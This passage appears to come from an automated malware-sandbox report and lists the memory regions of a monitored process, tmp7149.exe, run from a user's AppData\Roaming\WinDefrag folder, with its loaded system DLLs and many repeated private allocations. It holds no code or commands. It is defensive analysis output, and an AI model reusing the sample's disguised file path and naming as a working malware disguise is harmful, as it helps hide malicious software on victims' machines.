0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5170 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5171 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5172 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5173 start_va = 0x90000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 5174 start_va = 0x290000 end_va = 0x293fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 5175 start_va = 0x400000 end_va = 0x487fff entry_point = 0x400000 region_type = mapped_file name = "tmp7149.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\windefrag\\tmp7149.exe") Region: id = 5176 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5177 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5178 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 5179 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 5180 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 5181 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 5182 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5183 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5184 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5185 start_va = 0x2e0000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 5186 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5187 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5188 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5189 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 5190 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5191 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5192 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 5193 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 5194 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5195 start_va = 0x360000 end_va = 0x3c6fff entry_point = 0x360000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5196 start_va = 0x6e0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 5197 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5198 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5199 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5200 start_va = 0x20000 end_va = 0x3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5201 start_va = 0x5d0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 5202 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 5203 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5204 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5205 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5206 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5207 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5208 start_va = 0x75600000 end_va = 0x75615fff entry_point = 0x75600000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 5209 start_va = 0x490000 end_va = 0x4cbfff entry_point = 0x490000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5210 start_va = 0x490000 end_va = 0x4cbfff entry_point = 0x490000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5211 start_va = 0x490000 end_va = 0x4cbfff entry_point = 0x490000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5212 start_va = 0x490000 end_va = 0x4cbfff entry_point = 0x490000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5213 start_va = 0x490000 end_va = 0x4cbfff entry_point = 0x490000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5214 start_va = 0x755c0000 end_va = 0x755fafff entry_point = 0x755c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5215 start_va = 0x6f0000 end_va = 0x9befff entry_point = 0x6f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5216 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5217 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5218 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5219 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5220 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 5221 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 5222 start_va = 0x2b0000 end_va = 0x2cdfff entry_point = 0x2b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5223 start_va = 0x9c0000 end_va = 0xb47fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 5224 start_va = 0x2b0000 end_va = 0x2cdfff entry_point = 0x2b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5225 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5226 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5227 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 5228 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 5229 start_va = 0xb50000 end_va = 0xcd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b50000" filename = "" Region: id = 5230 start_va = 0xce0000 end_va = 0xd9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 5231 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 5232 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5233 start_va = 0x755b0000 end_va = 0x755bafff entry_point = 0x755b0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5234 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 5235 start_va = 0xda0000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 5236 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 5237 start_va = 0x76330000 end_va = 0x7644cfff entry_point = 0x76330000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 5238 start_va = 0x77800000 end_va = 0x7780bfff entry_point = 0x77800000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 5239 start_va = 0x3d0000 end_va = 0x3d6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 5240 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 5241 start_va = 0xfa0000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 5242 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 5243 start_va = 0x13a0000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 5244 start_va = 0x75950000 end_va = 0x7595cfff entry_point = 0x75950000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 5245 start_va = 0x75580000 end_va = 0x755a8fff entry_point = 0x75580000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5246 start_va = 0x75560000 end_va = 0x75576fff entry_point = 0x75560000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 5247 start_va = 0x6d0000 end_va = 0x6d4fff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 5248 start_va = 0x10000000 end_va = 0x10006fff entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 5249 start_va = 0x13e0000 end_va = 0x13e0fff entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 5250 start_va = 0x13f0000 end_va = 0x13f0fff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 5251 start_va = 0x1400000 end_va = 0x146afff entry_point = 0x1400000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5280 start_va = 0x1470000 end_va = 0x1498fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5281 start_va = 0x1470000 end_va = 0x1478fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5282 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5283 start_va = 0x1470000 end_va = 0x1472fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5284 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5285 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5287 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5290 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5293 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5296 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5299 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5302 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5305 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5308 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5311 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5314 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5317 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5320 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5323 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5326 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5329 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5332 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5335 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5338 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5341 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5344 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5347 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5350 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5353 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5356 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5359 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5362 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5365 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5368 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5371 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5374 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5377 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5380 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5383 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5386 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5389 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5392 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5395 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5398 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5401 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5404 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5407 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5410 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5413 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5416 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5419 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5422 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5425 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5428 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5431 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5434 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5437 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5440 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5443 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5446 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5449 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5452 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5455 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5458 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5461 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5464 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5467 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5470 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5473 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5476 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5479 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5482 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5485 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5488 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5491 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5494 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5497 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5500 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5503 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5506 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5509 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5512 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5515 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5518 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5521 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5540 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5543 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5546 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5550 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5553 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5556 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5559 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5562 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5565 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5568 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5571 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5574 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5577 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5580 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5583 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5586 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5591 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5594 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5598 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5601 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5604 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5608 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5611 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5614 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 5617 start_va = 0x1470000 end_va = 0x1470fff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = 